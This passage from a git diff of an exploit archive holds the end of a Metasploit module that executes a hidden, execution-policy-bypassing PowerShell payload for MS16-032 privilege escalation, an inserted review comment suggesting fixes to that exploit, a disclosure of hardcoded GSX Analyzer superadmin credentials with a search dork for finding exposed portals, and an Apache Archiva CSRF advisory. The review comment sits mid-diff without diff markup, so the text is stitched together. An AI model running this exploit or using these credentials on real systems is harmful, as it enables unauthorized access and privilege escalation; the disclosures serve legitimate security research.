+ print_error(error_msg) + else + print_good("Compressed size: #{ms16_032_c.size}") + end + + if datastore['DRY_RUN'] + print_good("cmd.exe /C powershell -exec Bypass -nonI -window Hidden #{ms16_032_c}") + return + end + + print_status("Executing exploit script...") + cmd = "cmd.exe /C powershell -exec Bypass -nonI -window Hidden #{ms16_032_c}" + args = nil + + begin + process = session.sys.process.execute(cmd, args, { + 'Hidden' => true, + 'Channelized' => false + }) + rescue + print_error("An error occurred executing the script.") + end + end + + def cleanup + sleep_t = datastore['TIMEOUT'] + vprint_warning("Sleeping #{sleep_t} seconds before deleting #{@upfile}...") + sleep sleep_t + + begin + rm_f(@upfile) + print_good("Cleaned up #{@upfile}") + rescue + print_error("There was an issue with cleanup of the powershell payload script.") + end + end +end \ No newline at end of file diff --git a/platforms/windows/webapps/40106.txt b/platforms/windows/webapps/40106.txt new file mode 100755 index 000000000..00c02e63f --- /dev/null +++ b/platforms/windows/webapps/40106.txt 
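Review bot: `cleanup` unconditionally sleeps `TIMEOUT` seconds and then calls `rm_f(@upfile)`, but `exploit` exits before `@upfile` is assigned on several paths (session already SYSTEM, `check` returning Safe, architecture not determined), so those runs wait the full timeout for nothing and then land in the `rescue` on `rm_f(nil)`; a guard at the top, `return if @upfile.nil?`, avoids both. The payload write `fd = session.fs.file.new(@upfile,"wb")` is not wrapped in `begin ... ensure fd.close end`, so a failing `write` leaks the channel. Both `rescue` clauses are bare and therefore catch every `StandardError` while discarding the exception; logging `e.message` via `rescue => e` would make failures diagnosable.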
@@ -0,0 +1,31 @@
+# Exploit Title: GSX Analyzer hardcoded superadmin credentials in Main.swf
+# Google Dork: inurl:"/Main.swf?cachebuster=" (need to manually look for stringtitle "Loading GSX Analyzer ... 0%")
+# Date: 12-07-16
+# Exploit Author: ndevnull
+# Vendor Homepage: http://www.gsx.com/products/gsx-analyzer
+# Software Link: http://www.gsx.com/download-the-trial-ma
+# Version: 10.12, but also found in version 11
+# Tested on: Windows Server 2008
+# CERT : VR-241
+# CVE :
+
+1. Description
+
+After decompiling the SWF file "Main.swf", a hardcoded credential in one of the products of GSX, namely GSX Analyzer, has been found. Credential is a superadmin account, which is not listed as a user in the userlist, but can be used to login GSX Analyzer portals. Seemingly a backdoor or a "solution" to provide "support" from the vendor.
+
+The found credentials are:
+Username: gsxlogin
+Password: gsxpassword
+
+2. Proof of Concept
+
+A few sites externally on the internet are affected by this incident. Presumably all of the externally disclosed GSX analyzer portals have this vulnerability.
+
+Code snippet:
+-----------------
+if ((((event.getLogin().toLowerCase() == "gsxlogin")) && ((event.getPwd() == "gsxpassword")))){
+-----------------
+
+3. Solution:
+
+Vendor has been informed on 12-06-16, also CERT has been notified with ID VR-241
diff --git a/platforms/xml/webapps/40109.txt b/platforms/xml/webapps/40109.txt
new file mode 100755
index 000000000..1cd308c61
--- /dev/null
+++ b/platforms/xml/webapps/40109.txt
@@ -0,0 +1,138 @@
+RCE Security Advisory
+https://www.rcesecurity.com
+
+
+1. ADVISORY INFORMATION
+=======================
+Product: Apache Archiva
+Vendor URL: https://archiva.apache.org
+Type: Cross-Site Request Forgery [CWE-253]
+Date found: 2016-05-31
+Date published: 2016-07-11
+CVSSv3 Score: 5.4 (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N)
+CVE: CVE-2016-4469
+
+
+2. CREDITS
+==========
+This vulnerability was discovered and researched by Julien Ahrens from
+RCE Security.
+
+
+3. VERSIONS AFFECTED
+====================
+Apache Archiva v1.3.9
+older versions may be affected too.
+
+
+4. INTRODUCTION
+===============
+Apache Archiva™ is an extensible repository management software that helps
+taking care of your own personal or enterprise-wide build artifact
+repository. It is the perfect companion for build tools such as Maven,
+Continuum, and ANT.
+
+(from the vendor's homepage)
+
+
+5. VULNERABILITY DETAILS
+========================
+The application basically offers a Cross-Site Request Forgery protection
+using the a Struts-based token called "token". While many administrative
+functionalities like adding new users are protected on this way, the
+following HTTP POST-based functions are missing this token and are
+therefore vulnerable to CSRF:
+
+Adding new repository proxy connectors:
+/archiva/admin/addProxyConnector_commit.action
+
+Adding new repositories:
+/archiva/admin/addRepository_commit.action
+
+Editing existing repositories:
+/archiva/admin/editRepository_commit.action
+
+Adding legacy artifact paths:
+/archiva/admin/addLegacyArtifactPath_commit.action
+
+Changing the organizational appearance:
+/archiva/admin/saveAppearance.action
+
+Uploading new artifacts:
+/archiva/upload_submit.action
+
+
+The following Proof-of-Concept triggers this vulnerability and adds a new
+proxy connector called "CSRF":
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+6. 
RISK
+=======
+To successfully exploit this vulnerability a user with administrative rights
+must be tricked into visiting an arbitrary website while having an
+authenticated session in the application.
+
+The vulnerability allows remote attackers to perform sensitive
+administrative actions like adding new repository proxy connectors, adding
+new repositories, editing existing repositories, adding legacy artifact
+paths, changing the organizational appearance or uploading new artifacts in
+the authentication context of the targeted user.
+
+
+7. SOLUTION
+===========
+Upgrade/Migrate to Apache Archiva 2.2.1
+
+
+8. REPORT TIMELINE
+==================
+2016-05-31: Discovery of the vulnerability
+2016-05-31: Notified vendor via public security mail address
+2016-06-06: No response, sent out another notification
+2016-06-10: Vendor states that this version is out of support
+2016-06-21: Vendor assigns CVE-2016-4469
+2016-07-11: Advisory released
+
+
+9. REFERENCES
+=============
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4469